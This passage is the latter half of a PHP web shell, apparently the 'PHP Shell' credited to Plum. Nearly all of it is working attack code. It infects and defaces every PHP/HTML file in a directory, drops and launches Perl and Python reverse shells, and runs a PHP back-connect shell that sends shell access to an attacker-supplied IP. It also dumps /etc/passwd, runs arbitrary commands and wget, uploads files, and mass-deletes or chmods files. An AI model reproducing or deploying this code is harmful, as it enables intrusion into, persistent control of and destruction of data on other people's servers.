794 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
795 $failed++;
796 }
797 }
798 }
799 }
800 echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
801 } else {
802 error("$infdir is not a valid directory!");
803 }
804}
805if(isset($_GET['fileInfect'])) {
806 echo "<center>
807 This will append your infect code to the top of every file in the given directory.<br>
808 <form action='' method='post'>
809 Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
810 File types to infect:
811 <select name='infect_type'>
812 <option value='php'>PHP</option>
813 <option value='html'>HTML</option>
814 <option value='both'>Both</option>
815 </select><br>
816 Code to infect files with:<br>
817 <textarea name='infect_code' cols='110' rows='20'></textarea><br>
818 <input type='submit' name='do_infect' value='Infect'>
819 </form>
820 </center>";
821}
822
823//Deface files
824if(isset($_POST['do_deface'])) {
825 $defdir = rtrim($_POST['deface_dir'], '/');
826 $type = $_POST['deface_type'];
827 $defsource = $_POST['deface_source'];
828 if(is_dir($defdir)) {
829 $success = 0;
830 $failed = 0;
831 foreach(mass_files($defdir, false) as $key => $files) {
832 $exten = pathinfo($files, PATHINFO_EXTENSION);
833 if($type == 'php') {
834 if($exten == 'php') {
835 if($files != __FILE__) {
836 if(file_put_contents($files, $defsource)) {
837 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
838 $success++;
839 } else {
840 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
841 $failed++;
842 }
843 }
844 }
845 } elseif($type == 'html') {
846 if($exten == 'html') {
847 if($files != __FILE__) {
848 if(file_put_contents($files, $defsource)) {
849 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
850 $success++;
851 } else {
852 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
853 $failed++;
854 }
855 }
856 }
857 } elseif($type == 'both') {
858 if($exten == 'html' or $exten == 'php') {
859 if($files != __FILE__) {
860 if(file_put_contents($files, $defsource)) {
861 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
862 $success++;
863 } else {
864 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
865 $failed++;
866 }
867 }
868 }
869 }
870 }
871 echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
872 } else {
873 error("$defdir is not a valid directory!");
874 }
875}
876if(isset($_GET['fileDeface'])) {
877 echo "<center>
878 This will deface every file in the given directory. This will not deface this shell.<br>
879 <form action='' method='post'>
880 Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
881 File types to deface:
882 <select name='deface_type'>
883 <option value='php'>PHP</option>
884 <option value='html'>HTML</option>
885 <option value='both'>Both</option>
886 </select><br>
887 Source to deface files with:<br>
888 <textarea name='deface_source' cols='110' rows='20'></textarea><br>
889 <input type='submit' name='do_deface' value='Deface'>
890 </form>
891 </center>";
892}
893
894//Install MSD
895if(isset($_POST['install_msd'])) {
896 if($_POST['version'] == "1") {
897 $msd1link = $links['MSD1']['LINK'];
898 $name = "msdv2.zip";
899 } else {
900 $msd1link = $links['MSD2']['LINK'];
901 $name = "msd1.24.4.zip";
902 }
903 $msd1dir = rtrim($_POST['msd_dir'], '/');
904 if(is_dir($msd1dir)) {
905 $get = file_get_contents($msd1link);
906 if(file_put_contents("$msd1dir/$name", $get)) {
907 extract_file("$msd1dir/$name", $msd1dir, "zip");
908 } else {
909 error('Failed to write zip file to $msd1dir!');
910 }
911 } else {
912 if(mkdir($msd1dir, 0777)) {
913 $get = file_get_contents($msd1link);
914 if(file_put_contents("$msd1dir/$name", $get)) {
915 extract_file("$msd1dir/$name", $msd1dir, "zip");
916 } else {
917 error('Failed to write zip file to $msd1dir!');
918 }
919 } else {
920 error('Failed to make directory $msd1dir!');
921 }
922 }
923}
924if(isset($_GET['installMSD'])) {
925 echo "<center>
926 <form action='' method='post'>
927 <font size='4'>MySQL Dumper v2.1 By Plum</font><br>
928 Directory to install to. If it doesn't exist it will try and create it.<br>
929 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
930 <input type='hidden' name='version' value='1'>
931 <input type='submit' name='install_msd' value='Install'>
932 </form>
933 </center>";
934}
935if(isset($_GET['installMSD2'])) {
936 echo "<center>
937 <form action='' method='post'>
938 <font size='4'>MySQL Dumper v1.24.4 By <a href='http://www.mysqldumper.net/'>http://www.mysqldumper.net/</a></font><br>
939 Directory to install to. If it doesn't exist it will try and create it.<br>
940 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
941 <input type='hidden' name='version' value='2'>
942 <input type='submit' name='install_msd' value='Install'>
943 </form>
944 </center>";
945}
946
947//Back connect
948if(isset($_POST['bcpl_connect'])) {
949 $ip = $_POST['bcpl_ip'];
950 $port = $_POST['bcpl_port'];
951 if(can_exe()) {
952 if(file_exists("/tmp/bc.pl")) {
953 echo "<center>
954 Trying to connect to $ip on port $port<br>
955 The response from 'perl /tmp/bc.pl $ip $port' was:<br>
956 <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
957 </center>";
958 } else {
959 error("/tmp/bc.pl does not exist!");
960 }
961 } else {
962 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
963 }
964}
965if(isset($_GET['bcPerl'])) {
966 if(can_exe()) {
967 if(is_dir('/tmp')) {
968 if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
969 success("Successfully wrote /tmp/bc.pl!");
970 echo "<center>
971 <form action='' method='post'>
972 IP: <input type='text' name='bcpl_ip' value='$yourip'>
973 Port: <input type='text' name='bcpl_port' value='2121' size='3'>
974 <input type='submit' name='bcpl_connect' value='Connect'><br>
975 Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
976 </form>
977 </center>";
978 } else {
979 error("Failed to write Perl source to /tmp/bc.pl!");
980 }
981 } else {
982 error('/tmp is not a directory!');
983 }
984 } else {
985 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
986 }
987}
988
989if(isset($_POST['bcpy_connect'])) {
990 $ip = $_POST['bcpy_ip'];
991 $port = $_POST['bcpy_port'];
992 if(can_exe()) {
993 if(file_exists("/tmp/bc.py")) {
994 echo "<center>
995 Trying to connect to $ip on port $port<br>
996 The response from 'python /tmp/bc.py $ip $port' was:<br>
997 <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
998 </center>";
999 } else {
1000 error("/tmp/bc.py does not exist!");
1001 }
1002 } else {
1003 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1004 }
1005}
1006if(isset($_GET['bcPython'])) {
1007 if(can_exe()) {
1008 if(is_dir("/tmp")) {
1009 if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
1010 success("Successfully wrote /tmp/by.py");
1011 echo "<center>
1012 <form action='' method='post'>
1013 IP: <input type='text' name='bcpy_ip' value='$yourip'>
1014 Port: <input type='text' name='bcpy_port' value='2121' size='3'>
1015 <input type='submit' name='bcpy_connect' value='Connect'><br>
1016 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1017 </form>
1018 </center>";
1019 } else {
1020 error("Failed to write Python source to /tmp/by.py");
1021 }
1022 } else {
1023 error("/tmp is not a directory!");
1024 }
1025 } else {
1026 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1027 }
1028}
1029
1030if(isset($_POST['bcphp_connect'])) {
1031 $ip = $_POST['bcphp_ip'];
1032 $port = $_POST['bcphp_port'];
1033 echo "<center>Trying to connect!</center>";
1034 $sockopen = fsockopen($ip , $port , $errno, $errstr);
1035 if(!$sockopen) {
1036 error("Failed to open socket!");
1037 } elseif($errno != 0) {
1038 error("$errno: $errstr");
1039 } else {
1040 fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
1041 $uname = exe_cmd("uname -a");
1042 $id = exe_cmd("id");
1043 fputs($sockopen, "$uname$id\n");
1044 while(!feof($sockopen)) {
1045 fputs($sockopen, "> ");
1046 $command = fgets($sockopen);
1047 fputs($sockopen , exe_cmd($command));
1048 }
1049 fclose($sockopen);
1050 }
1051}
1052if(isset($_GET['bcPHP'])) {
1053 if(can_exe()) {
1054 echo "<center>
1055 <form action='' method='post'>
1056 IP: <input type='text' name='bcphp_ip' value='$yourip'>
1057 Port: <input type='text' name='bcphp_port' value='2121' size='3'>
1058 <input type='submit' name='bcphp_connect' value='Connect'><br>
1059 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1060 </form>
1061 </center>";
1062 } else {
1063 error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
1064 }
1065}
1066
1067//System stuff
1068if(isset($_GET['users'])) {
1069 if(file_exists('/etc/passwd')) {
1070 $getfile = file_get_contents('/etc/passwd');
1071 $exline = explode("\n", $getfile);
1072 echo "<table>
1073 <tr>
1074 <th>Username</th>
1075 <th>Password?</th>
1076 <th>UID</th>
1077 <th>GID</th>
1078 <th>UID Info</th>
1079 <th>Home Directory</th>
1080 <th>Command/Shell</th>
1081 </tr>";
1082 foreach($exline as $exl) {
1083 echo "<tr>";
1084 $excol = explode(":", $exl);
1085 foreach($excol as $exc) {
1086 echo "<td>$exc</td>";
1087 }
1088 echo "</tr>";
1089 }
1090 echo "</table>";
1091 } else {
1092 error("/etc/passwd does not exist!");
1093 }
1094}
1095
1096if(isset($_GET['processes'])) {
1097 if(can_exe()) {
1098 $processes = exe_cmd("ps aux");
1099 $stripfirstline = substr($processes, strpos($processes, "\n")+1);
1100 $exline = explode("\n", $stripfirstline);
1101 echo "<div id='hover'>
1102 <table width='100%' border='1'>
1103 <tr>
1104 <th>Kill</th>
1105 <th>USER</th>
1106 <th>PID</th>
1107 <th>%CPU</th>
1108 <th>%MEM</th>
1109 <th>VSZ</th>
1110 <th>RSS</th>
1111 <th>TTY</th>
1112 <th>STAT</th>
1113 <th>START</th>
1114 <th>TIME</th>
1115 <th>COMMAND</th>
1116 </tr>";
1117 foreach($exline as $exl) {
1118 echo "<tr>";
1119 $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
1120 if(count($exsp) > 11) {
1121 $slice = array_slice($exsp, 0, 10);
1122 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1123 foreach($slice as $s) {
1124 echo "<td>$s</td>";
1125 }
1126 $slice2 = array_slice($exsp, 10);
1127 echo "<td>".implode(" ", $slice2)."</td>";
1128 } else {
1129 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1130 foreach($exsp as $e) {
1131 echo "<td>$e</td>";
1132 }
1133 }
1134 echo "</tr>";
1135 }
1136 echo "</table></div>";
1137 } else {
1138 error("Can not execute commands! Must execute 'ps aux' to get processes.");
1139 }
1140}
1141
1142if(isset($_GET['memory'])) {
1143 if(file_exists('/proc/meminfo')) {
1144 $raminfo = file_get_contents('/proc/meminfo');
1145 echo "Ram:<br><pre>$raminfo</pre><br><br>";
1146 } else {
1147 error("/proc/meminfo does not exist!");
1148 }
1149 $hddfree = disk_free_space("/");
1150 $hddtotal = disk_total_space("/");
1151 $hddused = $hddtotal - $hddfree;
1152 $hddpercent = round(($hddused / $hddtotal) * 100);
1153 echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
1154}
1155
1156if(isset($_GET['cpu'])) {
1157 if(file_exists('/proc/cpuinfo')) {
1158 $cpuinfo = file_get_contents('/proc/cpuinfo');
1159 echo "<center>
1160 CPU Information:<br>
1161 <textarea cols='120' rows='20'>$cpuinfo</textarea>
1162 </center>";
1163 } else {
1164 error('/proc/cpuinfo does not exist!');
1165 }
1166}
1167
1168//Execute command
1169if(isset($_POST['exe_cmd'])) {
1170 $command = $_POST['command'];
1171 if(can_exe()) {
1172 echo "<center>
1173 <form action='' method='post'>
1174 <input type='text' name='command' size='75'>
1175 <input type='submit' name='exe_cmd'>
1176 </form>
1177 The response from '$command' was:<br>
1178 <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
1179 </center>";
1180 } else {
1181 error("Can not execute commands!");
1182 }
1183}
1184
1185//Create file
1186if(isset($_POST['create_file'])) {
1187 $createpath = $_POST['create_file_path'];
1188 if(!file_exists($createpath)) {
1189 if(fopen($createpath, "w+")) {
1190 redirect("?edit=$createpath");
1191 } else {
1192 error("Failed to create file!");
1193 }
1194 } else {
1195 error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
1196 }
1197}
1198//Create directory
1199if(isset($_POST['create_dir'])) {
1200 $dirpath = $_POST['create_dir_path'];
1201 if(!is_dir($dirpath)) {
1202 if(mkdir($dirpath, 0777)) {
1203 redirect("?dir=$dirpath");
1204 } else {
1205 error("Failed to make directory!");
1206 }
1207 } else {
1208 error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
1209 }
1210}
1211
1212//wget file
1213if(isset($_POST['do_wget'])) {
1214 $fileurl = $_POST['wget_file'];
1215 if(can_exe()) {
1216 echo "<center>
1217 The response from 'wget $fileurl' was:<br>
1218 <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
1219 </center>";
1220 } else {
1221 error("Commands can not be executed!");
1222 }
1223}
1224
1225//Upload file
1226if(isset($_POST['do_upload'])) {
1227 $uploaddir = $_POST['upload_dir'];
1228 $uploadname = $_FILES['upload_file']['name'];
1229 if(!file_exists("$uploaddir/$uploadname")) {
1230 if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
1231 redirect("?dir=$uploaddir");
1232 } else {
1233 error("Failed to upload file!");
1234 }
1235 } else {
1236 error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
1237 }
1238}
1239
1240//Mass files
1241if(isset($_POST['mass_action'])) {
1242 $action = $_POST['action'];
1243 $checked = $_POST['massbox'];
1244 if($action == 'delete') {
1245 foreach($checked as $c) {
1246 if(is_dir($c)) {
1247 if(rmdir($c)) {
1248 echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
1249 } else {
1250 echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
1251 }
1252 } else {
1253 if(unlink($c)) {
1254 echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
1255 } else {
1256 echo "<font color='red'><b>Failed to delete file: $c</font><br>";
1257 }
1258 }
1259 }
1260 } elseif($action == 'chmod') {
1261 $chvalue = $_POST['chmod_value'];
1262 foreach($checked as $c) {
1263 if(chmod($c, $chvalue)) {
1264 echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
1265 } else {
1266 echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
1267 }
1268 }
1269 } else {
1270 error('Invalid action specified!');
1271 }
1272}
1273
1274//Display disabled functions
1275if(isset($_GET['disabledFunctions'])) {
1276 echo "Disabled functions:<br>";
1277 $ex = explode(",", $disabledfunc);
1278 foreach($ex as $e) {
1279 echo "$e<br>";
1280 }
1281}
1282
1283//Kill proccess
1284if(isset($_GET['killProcess'])) {
1285 $id = $_GET['killProcess'];
1286 if(posix_kill($id)) {
1287 success("Successfully killed process: $id");
1288 } else {
1289 error("Failed to kill process: $id");
1290 }
1291}
1292
1293//Check links
1294if(isset($_GET['checkLinks'])) {
1295 echo "<table border='1'>
1296 <tr>
1297 <th>Link</th>
1298 <th>Status</th>
1299 <th>MD5</th>
1300 <th>Description</td>
1301 </tr>";
1302 foreach($links as $key => $ar) {
1303 $link = $ar['LINK'];
1304 $md5 = $ar['MD5'];
1305 $desc = $ar['DESC'];
1306 $headers = @get_headers($link);
1307 echo "<tr>";
1308 echo "<td><a href='$link'>$link</a></td>";
1309 if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
1310 echo "<td><font color='green'><b>OK</b></font></td>";
1311 } else {
1312 echo "<td><font color='red'><b>Not Found</b></font></td>";
1313 }
1314 if(md5_file($link) == $md5) {
1315 echo "<td><font color='green'><b>Match</b></font></td>";
1316 } else {
1317 echo "<td><font color='red'><b>No Match</b></font></td>";
1318 }
1319 echo "<td>$desc</td>";
1320 echo "</tr>";
1321 }
1322 echo "</table>";
1323}
1324
1325//Credits
1326if(isset($_GET['credits'])) {
1327 echo "<center>
1328 <font size='6'><b>PHP Shell v$version</font></b><br>
1329 Written By: Plum (@PlumLulz or plumm@jabber.org)<br>
1330 Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
1331 MySQL Dumper v2.1: Plum (@PlumLulz or plumm@jabber.org)<br>
1332 MySQL Dumper 1.24.4: <a href='http://mysqldumper.net'>http://mysqldumper.net</a><br>
1333 Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
1334 Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)<br>
1335 I think that is about it. Enjoy!
1336 </center>";
1337}
1338
1339//Kill
1340if(isset($_GET['kill'])) {
1341 if(unlink(__FILE__)) {
1342 success("Successfully killed shell!");
1343 } else {
1344 error("Failed to kill shell!");
1345 }
1346}
1347
1348//Let's get the files and directories for the current dir
1349$open = opendir($dir);
1350$files = array();
1351$direcs = array();
1352while ($file = readdir($open)) {
1353 if ($file != "." && $file != "..") {
1354 if (is_dir("$dir/$file")) {
1355 array_push($direcs, $file);
1356 } else {
1357 array_push($files, $file);
1358 }
1359 }
1360}
1361asort($direcs);
1362asort($files);
1363
1364//Let's display those files and dirs
1365//Starting with directories first.
1366echo <<<html
1367<br><br>
1368<table width='100%' border='1'>
1369 <tr>
1370 <th>Current Directory:
1371html;
1372$ex = explode("/", $dir);
1373for ($p = 0; $p < count($ex); $p++) {
1374 @$linkpath.=$ex[$p] . '/';
1375 $linkpath2 = rtrim($linkpath, "/");
1376 echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
1377}
1378echo <<<html
1379 </th>
1380 </tr>
1381</table>
1382
1383<form action='' method='post'>
1384 <div id="hover">
1385 <table width='100%' border='1'>
1386 <tr>
1387 <th>File/Dir Name</th>
1388 <th>Permissions</th>
1389 <th>Writeable</th>
1390 <th>Owner/Group</th>
1391 <th>Size</th>
1392 <th>Last Modified</th>
1393 <th>Delete</th>
1394 <th>Rename</th>
1395 <th>Mass</th>
1396 </tr>
1397html;
1398//Display directories
1399foreach($direcs as $dirs) {
1400 $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
1401 $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1402 $owner = fileowner("$dir/$dirs");
1403 $group = filegroup("$dir/$dirs");
1404 $size = "Directory";
1405 $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1406 echo <<<html
1407 <tr>
1408 <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
1409 <td style="text-align: center;">$perms</td>
1410 <td style="text-align: center;">$writeable</td>
1411 <td style="text-align: center;">$owner/$group</td>
1412 <td>$size</td>
1413 <td>$lastmod</td>
1414 <td><a href='?delD=$dir/$dirs'>Delete</a></td>
1415 <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
1416 <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
1417 </tr>
1418html;
1419}
1420
1421//Display files now
1422foreach($files as $file) {
1423 $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
1424 $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1425 $owner = fileowner("$dir/$file");
1426 $group = filegroup("$dir/$file");
1427 $size = ByteConversion(filesize("$dir/$file"));
1428 $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
1429 $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
1430 echo "<tr>";
1431 if(in_array($extension, $compression)) {
1432 echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
1433 } else {
1434 echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
1435 }
1436 echo <<<html
1437 <td style="text-align: center;">$perms</td>
1438 <td style="text-align: center;">$writeable</td>
1439 <td style="text-align: center;">$owner/$group</td>
1440 <td>$size</td>
1441 <td>$lastmod</td>
1442 <td><a href='?delF=$dir/$file'>Delete</a></td>
1443 <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
1444 <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
1445 </tr>
1446html;
1447}
1448echo <<<html
1449 </table>
1450 </div>
1451<div style='position:absolute; right:0%;'>
1452 <select name='action'>
1453 <option value='delete'>Delete</option>
1454 <option value='chmod'>chmod</option>
1455 </select>
1456 <input type='text' name='chmod_value' class='text' value='077' size='9'>
1457 <input type='submit' name='mass_action' value='Do Action'>
1458</div>
1459</form>
1460<br>
1461<br>
1462<br>
1463html;
1464
1465if(is_writeable($dir)) {
1466 $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
1467} else {
1468 $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
1469}
1470echo "<table width='100%' border='1'>
1471 <tr>
1472 <td>
1473 <center>
1474 <form action='' method='post'>
1475 Create File:<br>
1476 <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
1477 <input type='submit' name='create_file' value='Create'><br>
1478 $writeable
1479 </form>
1480 </center>
1481 </td>
1482 <td>
1483 <center>
1484 <form action='' method='post'>
1485 Create Directory:<br>
1486 <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
1487 <input type='submit' name='create_dir' value='Create'><br>
1488 $writeable
1489 </form>
1490 </center>
1491 </td>
1492 </tr>
1493 <tr>
1494 <td>
1495 <center>
1496 <form action='' method='get'>
1497 Edit File:<br>
1498 <input type='text' name='edit' size='55' value='$dir/index.php'>
1499 <input type='submit' value='Edit'>
1500 </form>
1501 </center>
1502 </td>
1503 <td>
1504 <center>
1505 <form action='' method='get'>
1506 Go To Directory:<br>
1507 <input type='text' name='dir' size='55' value='/tmp'>
1508 <input type='submit' value='Go'>
1509 </form>
1510 </center>
1511 </td>
1512 </tr>
1513 <tr>
1514 <td>
1515 <center>
1516 <form action='' method='post' enctype='multipart/form-data'>
1517 Upload To Directory:<br>
1518 <input type='text' name='upload_dir' size='55' value='$dir'><br>
1519 <input type='file' name='upload_file'>
1520 <input type='submit' name='do_upload' value='Upload'><br>
1521 $writeable
1522 </form>
1523 </center>
1524 </td>
1525 <td>
1526 <center>
1527 <form action='' method='post'>
1528 wget file:<br>
1529 <input type='text' name='wget_file' size='55' value='http://'>
1530 <input type='submit' name='do_wget' value='wget'>
1531 </form>
1532 </center>
1533 </td>
1534 </tr>
1535 <tr>
1536 <td colspan='2'>
1537 <center>
1538 <form action='' method='post'>
1539 Execute Command:<br>
1540 <input type='text' name='command' size='65'>
1541 <input type='submit' name='exe_cmd' value='Execute'>
1542 </form>
1543 </center>
1544 </td>
1545 </tr>
1546 </table>
1547 <br>
1548 <br>";
1549
1550?>